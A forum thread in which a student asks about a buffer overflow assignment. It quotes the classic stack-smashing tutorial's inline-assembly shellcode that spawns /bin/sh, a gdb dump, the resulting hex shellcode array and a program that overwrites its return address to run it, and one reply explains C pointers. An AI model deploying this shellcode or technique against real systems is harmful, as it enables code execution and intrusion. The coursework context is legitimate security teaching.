Jump to content
Sign in to follow this  
Ziggy54354

Buffer Overflow Assignment

Recommended Posts

My prof decided to give us a buffer overflow assignment for my comp security class... alot of how it works deals with assembly language and c (never learned c... seeing as our curriculum is primarily java based... go figure). We were givin this site http://insecure.org/stf/smashstack.html and on it is the following:

 

Looks good. To make sure it works correctly we must compile it and run it.

But there is a problem. Our code modifies itself, but most operating system

mark code pages read-only. To get around this restriction we must place the

code we wish to execute in the stack or data segment, and transfer control

to it. To do so we will place our code in a global array in the data

segment. We need first a hex representation of the binary code. Lets

compile it first, and then use gdb to obtain it.

 

shellcodeasm.c

------------------------------------------------------------------------------

void main() {

__asm__("

jmp 0x2a # 3 bytes

popl %esi # 1 byte

movl %esi,0x8(%esi) # 3 bytes

movb $0x0,0x7(%esi) # 4 bytes

movl $0x0,0xc(%esi) # 7 bytes

movl $0xb,%eax # 5 bytes

movl %esi,%ebx # 2 bytes

leal 0x8(%esi),%ecx # 3 bytes

leal 0xc(%esi),%edx # 3 bytes

int $0x80 # 2 bytes

movl $0x1, %eax # 5 bytes

movl $0x0, %ebx # 5 bytes

int $0x80 # 2 bytes

call -0x2f # 5 bytes

.string \"/bin/sh\" # 8 bytes

");

}

------------------------------------------------------------------------------

 

------------------------------------------------------------------------------

[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c

[aleph1]$ gdb shellcodeasm

GDB is free software and you are welcome to distribute copies of it

under certain conditions; type "show copying" to see the conditions.

There is absolutely no warranty for GDB; type "show warranty" for details.

GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...

(gdb) disassemble main

Dump of assembler code for function main:

0x8000130 <main>: pushl %ebp

0x8000131 <main+1>: movl %esp,%ebp

0x8000133 <main+3>: jmp 0x800015f <main+47>

0x8000135 <main+5>: popl %esi

0x8000136 <main+6>: movl %esi,0x8(%esi)

0x8000139 <main+9>: movb $0x0,0x7(%esi)

0x800013d <main+13>: movl $0x0,0xc(%esi)

0x8000144 <main+20>: movl $0xb,%eax

0x8000149 <main+25>: movl %esi,%ebx

0x800014b <main+27>: leal 0x8(%esi),%ecx

0x800014e <main+30>: leal 0xc(%esi),%edx

0x8000151 <main+33>: int $0x80

0x8000153 <main+35>: movl $0x1,%eax

0x8000158 <main+40>: movl $0x0,%ebx

0x800015d <main+45>: int $0x80

0x800015f <main+47>: call 0x8000135 <main+5>

0x8000164 <main+52>: das

0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp

0x8000168 <main+56>: das

0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>

0x800016b <main+59>: addb %cl,0x55c35dec(%ecx)

End of assembler dump.

(gdb) x/bx main+3

0x8000133 <main+3>: 0xeb

(gdb)

0x8000134 <main+4>: 0x2a

(gdb)

.

.

.

------------------------------------------------------------------------------

 

testsc.c

------------------------------------------------------------------------------

char shellcode[] =

"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"

"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"

"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"

"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

 

void main() {

int *ret;

 

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;

 

}

------------------------------------------------------------------------------

------------------------------------------------------------------------------

[aleph1]$ gcc -o testsc testsc.c

[aleph1]$ ./testsc

$ exit

[aleph1]$

------------------------------------------------------------------------------

 

first question.. where the heck did the the hex stuff in char shellcode[] from from?

second question... what is the main doing? like i said im not familiar with the syntax in C so im not sure what putting a * next to a variable does or what the & sign does.

Edited by Ziggy54354

Share this post


Link to post
Share on other sites
I'm not familiar with the syntax in C so im not sure what putting a * next to a variable does or what the & sign does.

When declaring variables (like int * foo) the * makes that variable a pointer. If used inline with code, it dereferences the pointer.

 

& grabs the address of whatever it's used on (IE: &foo grabs the address of the variable foo).

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×